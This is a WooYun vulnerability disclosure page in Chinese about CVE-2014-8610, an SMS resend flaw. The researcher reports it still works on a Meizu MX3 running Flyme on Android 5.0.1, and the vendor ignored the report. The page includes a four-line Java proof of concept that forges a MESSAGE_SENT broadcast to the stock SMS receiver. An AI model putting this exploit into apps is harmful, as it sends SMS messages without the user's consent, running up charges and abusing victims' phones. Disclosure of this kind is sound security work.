当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152052

漏洞标题:魅族mx3 flyme系统短信重发漏洞

相关厂商:魅族科技

漏洞作者: 约吗

提交时间:2015-11-05 16:26

修复时间:2016-02-08 16:30

公开时间:2016-02-08 16:30

漏洞类型:非授权访问/认证绕过

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-05: 细节已通知厂商并且等待厂商处理中
2015-11-10: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2016-01-04: 细节向核心白帽子及相关领域专家公开
2016-01-14: 细节向普通白帽子公开
2016-01-24: 细节向实习白帽子公开
2016-02-08: 细节向公众公开

简要描述:

详细说明:

CVE-2014-8610 Android < 5.0 短信重发漏洞
这么嗨一个洞居然这么久了都没修复
不是说好的<5.0吗 怎么我测试的mx3的flyme版本是4.5.6A,android版本是5.0.1,怎么还会出现这漏洞呢,按理说是修复了才对的啊,难道。。。。
===================================================================
其它版本是否也存在问题请自测,实在不想再刷固件了,刷了还是一个卵样,卡卡卡卡。。。
杨颜,敢不敢把固件弄得更卡点,bug更多点

漏洞证明:

POC>>>>>>>>>>>>>>>

Intent intent= new Intent("com.android.mms.transaction.MESSAGE_SENT");
intent.setData(Uri.parse("content://sms"));
intent.setClassName("com.android.mms", "com.android.mms.transaction.SmsReceiver");
sendOrderedBroadcast(intent,null,null,null, SmsManager.RESULT_ERROR_RADIO_OFF,null,null);

修复方案:

只想求个pro 5 64G的M码

版权声明:转载请注明来源 约吗@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-08 16:30

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

2015-11-10:感谢白帽子,漏洞通知邮箱出了点问题,导致确认漏洞时间过晚,被主动忽略了,再次抱歉,你申请的pro 5 64G M码我想办法给你申请,拿到了私信你。


漏洞评价:

评价

  1. 2015-11-05 16:48 | mango ( 核心白帽子 | Rank:1832 漏洞数:271 | 我有个2b女友!)

    求POC ~~求APP

  2. 2015-11-05 21:39 | px1624 ( 普通白帽子 | Rank:1074 漏洞数:181 | px1624)

    mx3,渣渣。

  3. 2015-11-06 09:11 | 约吗 ( 路人 | Rank:21 漏洞数:3 | 啪啪啪)

    @mango 就一已知漏洞而已

  4. 2015-11-11 18:32 | mango ( 核心白帽子 | Rank:1832 漏洞数:271 | 我有个2b女友!)

    @约吗 有APP么~ 求个 我来测试~

  5. 2015-11-11 18:59 | 约吗 ( 路人 | Rank:21 漏洞数:3 | 啪啪啪)

    @mango 加我qq1107655006